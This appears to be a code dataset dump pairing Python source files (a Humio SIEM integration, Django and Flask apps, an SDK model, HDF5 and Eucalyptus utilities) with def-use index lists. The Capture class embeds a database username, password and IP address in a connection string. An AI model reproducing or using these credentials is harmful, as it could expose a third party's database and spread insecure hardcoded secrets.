code
stringlengths 10
805k
| def_use_chains
sequencelengths 0
667
|
---|---|
'''HDF5 operating system operations.
license: HDF5Application/license.txt
Main authors:
Philipp Bucher
Michael Andre
'''
import KratosMultiphysics
import KratosMultiphysics.kratos_utilities as _utils
import os
class DeleteOldH5Files(object):
'''Delete h5-files from previous simulations.'''
def __call__(self, model_part, hdf5_file):
file_path, file_name = os.path.split(hdf5_file.GetFileName())
time_prefix = file_name.replace(".h5", "") + "-"
current_time = model_part.ProcessInfo[KratosMultiphysics.TIME]
if file_path == "":
file_path = "." # os.listdir fails with empty path
for name in os.listdir(file_path):
if name.startswith(time_prefix):
file_time = float(name.replace(".h5", "")[len(time_prefix):])
if file_time > current_time:
_utils.DeleteFileIfExisting(
os.path.join(file_path, name))
def Create(settings):
'''Return an operation specified by the setting's 'operation_type'.
This method is normally not used directly, but rather it is imported
in core.operations.model_part.Create using the 'module_name' setting.
'''
operation_type = settings['operation_type'].GetString()
if operation_type == 'delete_old_h5_files':
return DeleteOldH5Files()
else:
raise ValueError(
'"operation_type" has invalid value "' + operation_type + '"')
| [
[
[
138,
156
],
[
528,
546
]
],
[
[
164,
209
],
[
876,
882
]
],
[
[
217,
219
],
[
386,
388
],
[
665,
667
],
[
929,
931
]
],
[
[
228,
244
],
[
1335,
1351
]
],
[
[
966,
972
]
]
] |
from flask_wtf import FlaskForm
from wtforms import StringField,TextAreaField,SubmitField, SelectField
from wtforms.validators import Required
class CommentsForm(FlaskForm):
comment = TextAreaField('Comment', validators=[Required()])
submit = SubmitField('SUBMIT')
class UpdateProfile(FlaskForm):
bio = TextAreaField('Tell us about you.',validators = [Required()])
submit = SubmitField('Submit')
class BlogForm(FlaskForm):
title = StringField('Enter title',validators = [Required()])
subtitle= StringField('Enter subtitle',validators = [Required()])
content = TextAreaField('make a blog', validators=[Required()])
submit = SubmitField('Create Blog') | [
[
[
22,
31
],
[
164,
173
],
[
295,
304
],
[
431,
440
]
],
[
[
52,
63
],
[
455,
466
],
[
522,
533
]
],
[
[
64,
77
],
[
190,
203
],
[
317,
330
],
[
592,
605
]
],
[
[
78,
89
],
[
253,
264
],
[
392,
403
],
[
659,
670
]
],
[
[
91,
102
]
],
[
[
134,
142
],
[
227,
235
],
[
366,
374
],
[
495,
503
],
[
565,
573
],
[
633,
641
]
],
[
[
151,
163
]
],
[
[
281,
294
]
],
[
[
422,
430
]
]
] |
"""
NLP Sandbox Date Annotator API
# Overview The OpenAPI specification implemented by NLP Sandbox Annotators. # noqa: E501
The version of the OpenAPI document: 1.1.1
Contact: thomas.schaffter@sagebionetworks.org
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import nlpsandbox
from nlpsandbox.model.text_covid_symptom_annotation import TextCovidSymptomAnnotation
globals()['TextCovidSymptomAnnotation'] = TextCovidSymptomAnnotation
from nlpsandbox.model.text_covid_symptom_annotation_response import TextCovidSymptomAnnotationResponse
class TestTextCovidSymptomAnnotationResponse(unittest.TestCase):
"""TextCovidSymptomAnnotationResponse unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTextCovidSymptomAnnotationResponse(self):
"""Test TextCovidSymptomAnnotationResponse"""
# FIXME: construct object with mandatory attributes with example values
# model = TextCovidSymptomAnnotationResponse() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
[
[
295,
298
]
],
[
[
306,
314
],
[
639,
647
],
[
1097,
1105
]
],
[
[
323,
333
]
],
[
[
393,
419
],
[
462,
488
]
],
[
[
557,
591
]
],
[
[
600,
638
]
]
] |
import json
from datetime import datetime
from typing import Dict
import requests
import demistomock as demisto
from CommonServerPython import *
""" IMPORTS """
# Disable insecure warnings from urllib3
# - this does not disable SSL checking, just the warnings logged from urllib3
requests.packages.urllib3.disable_warnings()
""" CLASS for Humio"""
class Client:
def __init__(self, base_url, verify, proxies):
self.base_url = base_url
self.verify = verify
self.proxies = proxies
def http_request(self, method, url_suffix, data=None, headers=None):
server = self.base_url + url_suffix
res = requests.request(
method,
server,
json=data,
verify=self.verify,
headers=headers,
proxies=self.proxies,
)
return res
def test_module(client, headers=None):
response = client.http_request("GET", "/api/v1/status")
headers = {} if headers is None else headers
if response.status_code == 200:
try:
resp = response.json()
except Exception:
return "Could connect to server, but got unexpected response: {}".format(
response.text
)
if resp["status"].lower() == "ok":
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
if incidentquery is not None and incidentrepo is not None:
args = {
"queryString": incidentquery,
"repository": incidentrepo,
"start": "1m",
"end": "now",
"isLive": "false",
"timeZoneOffsetMinutes": 0,
}
humio_query(client, args, headers)
return "ok"
else:
return "ok"
else:
return "Bad status from server: ({}) {}".format(
response.status_code, response.text
)
def humio_query(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
try:
data["start"] = int(args.get("start"))
except ValueError:
data["start"] = args.get("start")
try:
data["end"] = int(args.get("end"))
except ValueError:
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes", 0))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/query"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Results", result, removeNull=True)
outputs = {"Humio.Query": [result]}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_query_job(client, args, headers):
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = args.get("end")
data["isLive"] = args.get("isLive").lower() in ["true", "1", "t", "y", "yes"]
data["timeZoneOffsetMinutes"] = int(args.get("timeZoneOffsetMinutes"))
if args.get("arguments"):
data["arguments"] = args.get("arguments")
url = "/api/v1/repositories/" + args.get("repository") + "/queryjobs"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Query Job", result, removeNull=True)
outputs = {"Humio.Job": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_poll(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
result["job_id"] = args.get("id")
markdown = tableToMarkdown(
"Humio Poll Result", result.get("events", []), removeNull=True
)
outputs = {"Humio.Result(val.job_id == obj.job_id)": result}
return markdown, outputs, result
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_job(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/queryjobs/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return "Command executed. Status code " + str(response), None, None
elif response.status_code == 404:
raise ValueError(response.text)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_alerts(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_alert_by_id(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Alert with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_create_alert(client, args, headers):
fulldata = {}
data = {}
data["queryString"] = args.get("queryString")
data["start"] = args.get("start")
data["end"] = "now"
data["isLive"] = True
fulldata["name"] = args.get("name")
fulldata["description"] = args.get("description", "")
fulldata["throttleTimeMillis"] = int(args.get("throttleTimeMillis"))
fulldata["silenced"] = args.get("silenced", "false").lower() in [
"true",
"1",
"t",
"y",
"yes",
]
fulldata["notifiers"] = [
notifier for notifier in args.get("notifiers").split(",") if notifier
]
fulldata["labels"] = [label for label in args.get("labels", "").split(",") if label]
fulldata["query"] = data
url = "/api/v1/repositories/" + args.get("repository") + "/alerts"
headers["Accept"] = "application/json"
response = client.http_request("POST", url, fulldata, headers)
if response.status_code == 201:
result = response.json()
markdown = tableToMarkdown("Humio Alerts", result, removeNull=True)
outputs = {"Humio.Alert(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_delete_alert(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alerts/" + args.get("id")
headers["Accept"] = "application/json"
response = client.http_request("DELETE", url, data, headers)
if response.status_code == 204:
return ("Command executed. Status code " + str(response), None, None)
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_list_notifiers(client, args, headers):
data: Dict[str, str] = {}
url = "/api/v1/repositories/" + args.get("repository") + "/alertnotifiers"
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def humio_get_notifier_by_id(client, args, headers):
data: Dict[str, str] = {}
url = (
"/api/v1/repositories/"
+ args.get("repository")
+ "/alertnotifiers/"
+ args.get("id")
)
headers["Accept"] = "application/json"
response = client.http_request("GET", url, data, headers)
if response.status_code == 200:
if not response.text:
raise ValueError("Notifier with id " + str(args.get("id")) + " not found")
result = response.json()
markdown = tableToMarkdown("Humio Notifiers", result, removeNull=True)
outputs = {"Humio.Notifier(val.id == obj.id)": result}
return markdown, outputs, result
else:
raise ValueError("Error:" + " response from server was: " + str(response.text))
def fetch_incidents(client, headers):
incidentquery = demisto.params().get("queryParameter")
incidentrepo = demisto.params().get("queryRepository")
timestampfrom = demisto.params().get("queryStartTime")
lastrun = demisto.getLastRun()
url = "/api/v1/repositories/" + incidentrepo + "/query"
headers["Accept"] = "application/json"
# set maximum of 50 returned events (this is idempotent)
incidentquery = incidentquery + "| head(50)"
backup_ts = int(datetime.now().timestamp()) * 1000
last_run_time = lastrun.get("time")
data = {
"queryString": incidentquery,
"end": "now",
"isLive": False,
"timeZoneOffsetMinutes": int(
demisto.params().get("queryTimeZoneOffsetMinutes")
),
}
if last_run_time is None:
# First run
data["start"] = timestampfrom
max_ts = 0
else:
data["start"] = int(last_run_time)
max_ts = int(last_run_time)
response = client.http_request("POST", url, data, headers)
if response.status_code == 200:
response_data = response.json()
for result in response_data:
ts = int(result.get("@timestamp", backup_ts))
if ts > max_ts:
max_ts = ts
max_ts += 1
demisto.setLastRun({"time": max_ts})
return form_incindents(response_data)
else:
raise ValueError(
"Error in fetching incidents. Error from server was: " + str(response.text)
)
def create_incident_from_humioquery(incident):
occurred = datetime.fromtimestamp(incident["@timestamp"] / 1000.0).strftime(
"%Y-%m-%dT%H:%M:%SZ"
)
keys = incident.keys()
labels = []
for key in keys:
labels.append({"type": key, "value": str(incident[key])})
return {
"name": "Humio Incident {id}".format(id=incident["@id"]),
"labels": labels,
"rawJSON": json.dumps(incident),
"occurred": occurred,
}
def form_incindents(incidents):
returnableincidents = []
for item in incidents:
returnableincidents.append(create_incident_from_humioquery(item))
return returnableincidents
def main():
apikey = demisto.params().get("API-key")
baseserver = (
demisto.params()["url"][:-1]
if (demisto.params()["url"] and demisto.params()["url"].endswith("/"))
else demisto.params()["url"]
)
verify_certificate = not demisto.params().get("insecure", False)
proxies = handle_proxy()
headers = {}
headers["Content-Type"] = "application/json"
headers["Authorization"] = "Bearer " + apikey
command = demisto.command()
LOG(f"Command being called is {command}")
try:
client = Client(baseserver, verify_certificate, proxies)
commands = {
"humio-query": humio_query,
"humio-query-job": humio_query_job,
"humio-poll": humio_poll,
"humio-delete-job": humio_delete_job,
"humio-list-alerts": humio_list_alerts,
"humio-get-alert-by-id": humio_get_alert_by_id,
"humio-create-alert": humio_create_alert,
"humio-delete-alert": humio_delete_alert,
"humio-list-notifiers": humio_list_notifiers,
"humio-get-notifier-by-id": humio_get_notifier_by_id,
}
if command == "test-module":
results = test_module(client, headers)
return_outputs(results)
elif demisto.command() == "fetch-incidents":
demisto.incidents(fetch_incidents(client, headers))
elif command in commands:
return_outputs(*commands[command](client, demisto.args(), headers))
except Exception as e:
return_error(str(e))
if __name__ in ["__main__", "builtin", "builtins"]:
main()
| [
[
[
7,
11
],
[
11938,
11942
]
],
[
[
33,
41
],
[
10495,
10503
],
[
11583,
11591
]
],
[
[
61,
65
],
[
4106,
4110
],
[
4938,
4942
],
[
5544,
5548
],
[
6146,
6150
],
[
8170,
8174
],
[
8660,
8664
],
[
9279,
9283
]
],
[
[
74,
82
],
[
285,
293
],
[
646,
654
]
],
[
[
91,
113
],
[
1313,
1320
],
[
1379,
1386
],
[
10068,
10075
],
[
10126,
10133
],
[
10186,
10193
],
[
10239,
10246
],
[
10718,
10725
],
[
11302,
11309
],
[
12218,
12225
],
[
12318,
12325
],
[
12346,
12353
],
[
12277,
12284
],
[
12398,
12405
],
[
12457,
12464
],
[
12658,
12665
],
[
13484,
13491
],
[
13536,
13543
],
[
13676,
13683
]
],
[
[
145,
146
],
[
2882,
2897
],
[
3816,
3831
],
[
4493,
4508
],
[
5828,
5843
],
[
6562,
6577
],
[
7855,
7870
],
[
8952,
8967
],
[
9746,
9761
],
[
12511,
12523
],
[
12680,
12683
],
[
13447,
13461
],
[
13634,
13648
],
[
13737,
13749
]
],
[
[
362,
368
],
[
12748,
12754
]
],
[
[
857,
868
],
[
13406,
13417
]
],
[
[
2044,
2055
],
[
1803,
1814
],
[
12844,
12855
]
],
[
[
3135,
3150
],
[
12888,
12903
]
],
[
[
4061,
4071
],
[
12931,
12941
]
],
[
[
4887,
4903
],
[
12975,
12991
]
],
[
[
5492,
5509
],
[
13026,
13043
]
],
[
[
6090,
6111
],
[
13082,
13103
]
],
[
[
6824,
6842
],
[
13139,
13157
]
],
[
[
8117,
8135
],
[
13193,
13211
]
],
[
[
8605,
8625
],
[
13249,
13269
]
],
[
[
9220,
9244
],
[
13311,
13335
]
],
[
[
10014,
10029
],
[
13554,
13569
]
],
[
[
11525,
11556
],
[
12121,
12152
]
],
[
[
12002,
12017
],
[
11354,
11369
]
],
[
[
12197,
12201
],
[
13816,
13820
]
]
] |
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from isi_sdk_8_2_2.models.drives_drive_firmware_update_node_status import DrivesDriveFirmwareUpdateNodeStatus # noqa: F401,E501
class DrivesDriveFirmwareUpdateNode(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'error': 'str',
'id': 'int',
'lnn': 'int',
'status': 'DrivesDriveFirmwareUpdateNodeStatus'
}
attribute_map = {
'error': 'error',
'id': 'id',
'lnn': 'lnn',
'status': 'status'
}
def __init__(self, error=None, id=None, lnn=None, status=None): # noqa: E501
"""DrivesDriveFirmwareUpdateNode - a model defined in Swagger""" # noqa: E501
self._error = None
self._id = None
self._lnn = None
self._status = None
self.discriminator = None
if error is not None:
self.error = error
if id is not None:
self.id = id
if lnn is not None:
self.lnn = lnn
if status is not None:
self.status = status
@property
def error(self):
"""Gets the error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:return: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: str
"""
return self._error
@error.setter
def error(self, error):
"""Sets the error of this DrivesDriveFirmwareUpdateNode.
Error message, if the HTTP status returned from this node was not 200. # noqa: E501
:param error: The error of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: str
"""
if error is not None and len(error) > 8192:
raise ValueError("Invalid value for `error`, length must be less than or equal to `8192`") # noqa: E501
if error is not None and len(error) < 0:
raise ValueError("Invalid value for `error`, length must be greater than or equal to `0`") # noqa: E501
self._error = error
@property
def id(self):
"""Gets the id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Node ID (Device Number) of a node. # noqa: E501
:return: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DrivesDriveFirmwareUpdateNode.
Node ID (Device Number) of a node. # noqa: E501
:param id: The id of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if id is not None and id > 2147483647: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value less than or equal to `2147483647`") # noqa: E501
if id is not None and id < 0: # noqa: E501
raise ValueError("Invalid value for `id`, must be a value greater than or equal to `0`") # noqa: E501
self._id = id
@property
def lnn(self):
"""Gets the lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Logical Node Number (LNN) of a node. # noqa: E501
:return: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: int
"""
return self._lnn
@lnn.setter
def lnn(self, lnn):
"""Sets the lnn of this DrivesDriveFirmwareUpdateNode.
Logical Node Number (LNN) of a node. # noqa: E501
:param lnn: The lnn of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: int
"""
if lnn is not None and lnn > 65535: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value less than or equal to `65535`") # noqa: E501
if lnn is not None and lnn < 1: # noqa: E501
raise ValueError("Invalid value for `lnn`, must be a value greater than or equal to `1`") # noqa: E501
self._lnn = lnn
@property
def status(self):
"""Gets the status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
Drive firmware update status information. # noqa: E501
:return: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:rtype: DrivesDriveFirmwareUpdateNodeStatus
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this DrivesDriveFirmwareUpdateNode.
Drive firmware update status information. # noqa: E501
:param status: The status of this DrivesDriveFirmwareUpdateNode. # noqa: E501
:type: DrivesDriveFirmwareUpdateNodeStatus
"""
self._status = status
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DrivesDriveFirmwareUpdateNode):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
[
[
243,
249
],
[
6253,
6259
]
],
[
[
257,
259
]
],
[
[
282,
285
],
[
5449,
5452
]
],
[
[
361,
396
]
],
[
[
424,
453
],
[
6493,
6522
]
]
] |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from branches import region, branch, resource
urlpatterns = [
url(r'^$', region.region_list, name='branches'),
url(r'^region/add/$', region.region_add, name='region_add'),
url(r'^region/list/$', region.region_list, name='region_list'),
url(r'^region/branch_detail/(?P<region_id>\d+)/$', region.branch_detail, name='branch_detail'),
url(r'^region/edit/(?P<region_id>\d+)/$', region.region_edit, name='region_edit'),
url(r'^region/delete/$', region.region_del, name='region_del'),
url(r'^branch/add/$', branch.branch_add, name='branch_add'),
url(r'^branch/list/$', branch.branch_list, name='branch_list'),
url(r'^branch/edit/(?P<branch_id>\d+)/$', branch.branch_edit, name='branch_edit'),
url(r'^branch/delete/$', branch.branch_del, name='branch_del'),
url(r'^branch/export/$', branch.branch_export, name='branch_export'),
url(r'^branch/resource_detail/(?P<branch_id>\d+)/$', branch.resource_detail, name='resource_detail'),
url(r'^resource/add/$', resource.resource_add, name='resource_add'),
url(r'^resource/list/$', resource.resource_list, name='resource_list'),
url(r'^resource/edit/(?P<resource_id>\d+)/$', resource.resource_edit, name='resource_edit'),
url(r'^resource/delete/$', resource.resource_del, name='resource_del'),
url(r'^resource/export/$', resource.resource_export, name='resource_export'),
] | [
[
[
76,
79
],
[
156,
159
],
[
209,
212
],
[
274,
277
],
[
342,
345
],
[
442,
445
],
[
529,
532
],
[
597,
600
],
[
662,
665
],
[
730,
733
],
[
817,
820
],
[
885,
888
],
[
959,
962
],
[
1065,
1068
],
[
1138,
1141
],
[
1214,
1217
],
[
1311,
1314
],
[
1387,
1390
]
],
[
[
81,
88
]
],
[
[
110,
116
],
[
167,
173
],
[
231,
237
],
[
297,
303
],
[
393,
399
],
[
484,
490
],
[
554,
560
]
],
[
[
118,
124
],
[
619,
625
],
[
685,
691
],
[
772,
778
],
[
842,
848
],
[
910,
916
],
[
1012,
1018
]
],
[
[
126,
134
],
[
1089,
1097
],
[
1163,
1171
],
[
1260,
1268
],
[
1338,
1346
],
[
1414,
1422
]
],
[
[
136,
147
]
]
] |
"""awards URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
url(r'^admin/', admin.site.urls),
url('', include('project.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'} ),
url(r'^api-token-auth/', obtain_auth_token),
]
| [
[
[
669,
672
],
[
835,
838
],
[
873,
876
],
[
911,
914
],
[
981,
984
],
[
1039,
1042
]
],
[
[
674,
681
],
[
881,
888
],
[
930,
937
]
],
[
[
709,
714
],
[
851,
856
]
],
[
[
747,
752
],
[
999,
1004
]
],
[
[
796,
813
],
[
1064,
1081
]
],
[
[
815,
826
]
]
] |
import requests
import sqlalchemy
import xmltodict
from sqlalchemy import create_engine, MetaData
from collections import defaultdict
import datetime
from utils import *
class Capture(object):
def __init__(self,
schema,
database='projetocurio'
):
self.schema = schema
self.database = database
self.engine = self.connect_to_db()
self.meta = self.load_db_schema()
self.url = None
self.data = None
def connect_to_db(self):
return create_engine('postgresql://uploaddata:VgyBhu876%%%@104.155.150.247:5432/projetocurio')
def load_db_schema(self):
metadata = MetaData()
metadata.reflect(self.engine, schema='camara_v1')
return metadata
def request(self, url):
data = requests.get(url)
if data.status_code == 200:
self.data = data.text
else:
self.data = None
def xml_to_dict(self):
self.data = xmltodict.parse(self.data)
def to_default_dict(self, list_of_dic):
return [defaultdict(lambda: None, dic) for dic in force_list(list_of_dic)]
def capture_data(self, url):
self.request(url)
self.xml_to_dict()
def insert_data(self, list_of_dic, table):
table_string = self.schema + '.' + table
with self.engine.connect() as conn:
print('inserting data')
for dic in list_of_dic:
conn.execute(self.meta.tables[table_string].insert(), dic)
print('closing connection') | [
[
[
7,
15
],
[
845,
853
]
],
[
[
23,
33
]
],
[
[
41,
50
],
[
1029,
1038
]
],
[
[
74,
87
],
[
568,
581
]
],
[
[
89,
97
],
[
707,
715
]
],
[
[
122,
133
],
[
1118,
1129
]
],
[
[
141,
149
]
],
[
[
168,
169
],
[
1160,
1170
]
],
[
[
177,
184
]
]
] |
# -*- coding: utf-8 -*-
# Copyright 2013-2017 Ent. Services Development Corporation LP
#
# Redistribution and use of this software in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Pyramid views for Eucalyptus and AWS key pairs
"""
import simplejson as json
from boto.exception import BotoServerError
from pyramid.httpexceptions import HTTPFound
from pyramid.view import view_config
from pyramid.response import Response
from ..forms.keypairs import KeyPairForm, KeyPairImportForm, KeyPairDeleteForm
from ..i18n import _
from ..models import Notification
from ..views import BaseView, LandingPageView, JSONResponse
from . import boto_error_handler
class KeyPairsView(LandingPageView):
def __init__(self, request):
super(KeyPairsView, self).__init__(request)
self.title_parts = [_(u'Key Pairs')]
self.initial_sort_key = 'name'
self.prefix = '/keypairs'
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.enable_smart_table = True
@view_config(route_name='keypairs', renderer='../templates/keypairs/keypairs.pt')
def keypairs_landing(self):
json_items_endpoint = self.request.route_path('keypairs_json')
# filter_keys are passed to client-side filtering in search box
self.filter_keys = ['name', 'fingerprint']
# sort_keys are passed to sorting drop-down
self.sort_keys = [
dict(key='name', name=_(u'Name: A to Z')),
dict(key='-name', name=_(u'Name: Z to A')),
]
return dict(
filter_keys=self.filter_keys,
search_facets=[],
sort_keys=self.sort_keys,
prefix=self.prefix,
initial_sort_key=self.initial_sort_key,
json_items_endpoint=json_items_endpoint,
delete_form=self.delete_form,
)
class KeyPairsJsonView(BaseView):
def __init__(self, request):
super(KeyPairsJsonView, self).__init__(request)
self.conn = self.get_connection()
@view_config(route_name='keypairs_json', renderer='json', request_method='POST')
def keypairs_json(self):
if not(self.is_csrf_valid()):
return JSONResponse(status=400, message="missing CSRF token")
keypairs = []
with boto_error_handler(self.request):
for keypair in self.get_items():
keypairs.append(dict(
name=keypair.name,
fingerprint=keypair.fingerprint,
))
return dict(results=keypairs)
def get_items(self):
ret = []
if self.conn:
ret = self.conn.get_all_key_pairs()
return ret
class KeyPairView(BaseView):
"""Views for single Key Pair"""
TEMPLATE = '../templates/keypairs/keypair_view.pt'
def __init__(self, request):
super(KeyPairView, self).__init__(request)
keyname = '/'.join(self.request.subpath)
if keyname == 'new':
keyname = _(u'Create')
if keyname == 'new2':
keyname = _(u'Import')
self.title_parts = [_(u'Key Pair'), keyname]
self.conn = self.get_connection()
self.keypair = self.get_keypair()
self.keypair_route_id = '/'.join(self.request.subpath)
self.keypair_form = KeyPairForm(self.request, keypair=self.keypair, formdata=self.request.params or None)
self.keypair_import_form = KeyPairImportForm(
self.request, keypair=self.keypair, formdata=self.request.params or None)
self.delete_form = KeyPairDeleteForm(self.request, formdata=self.request.params or None)
self.new_keypair_created = True if self._has_file_() else False # Detect if session has new keypair material
self.created_msg = _(u'Successfully created key pair {keypair}'.format(keypair=self.keypair_route_id))
controller_options_json = BaseView.escape_json(json.dumps({
'route_id': self.keypair_route_id,
'keypair_created': self.new_keypair_created,
'keypair_created_msg': self.created_msg,
}))
self.render_dict = dict(
keypair=self.keypair,
keypair_name=self.escape_braces(self.keypair.name) if self.keypair else '',
keypair_route_id=self.keypair_route_id,
keypair_form=self.keypair_form,
keypair_import_form=self.keypair_import_form,
keypair_created=self.new_keypair_created,
delete_form=self.delete_form,
keypair_names=self.get_keypair_names(),
controller_options_json=controller_options_json,
)
def get_keypair(self):
keypair_param = '/'.join(self.request.subpath)
if keypair_param == "new" or keypair_param == "new2":
return None
keypairs_param = [keypair_param]
keypairs = []
if self.conn:
try:
keypairs = self.conn.get_all_key_pairs(keynames=keypairs_param)
except BotoServerError:
return None
keypair = keypairs[0] if keypairs else None
return keypair
@view_config(route_name='keypair_view', renderer=TEMPLATE)
def keypair_view(self):
return self.render_dict
def get_keypair_names(self):
keypairs = []
with boto_error_handler(self.request):
if self.conn:
keypairs = [k.name for k in self.conn.get_all_key_pairs()]
return sorted(set(keypairs))
@view_config(route_name='keypair_create', request_method='POST', renderer=TEMPLATE)
def keypair_create(self):
if self.keypair_form.validate():
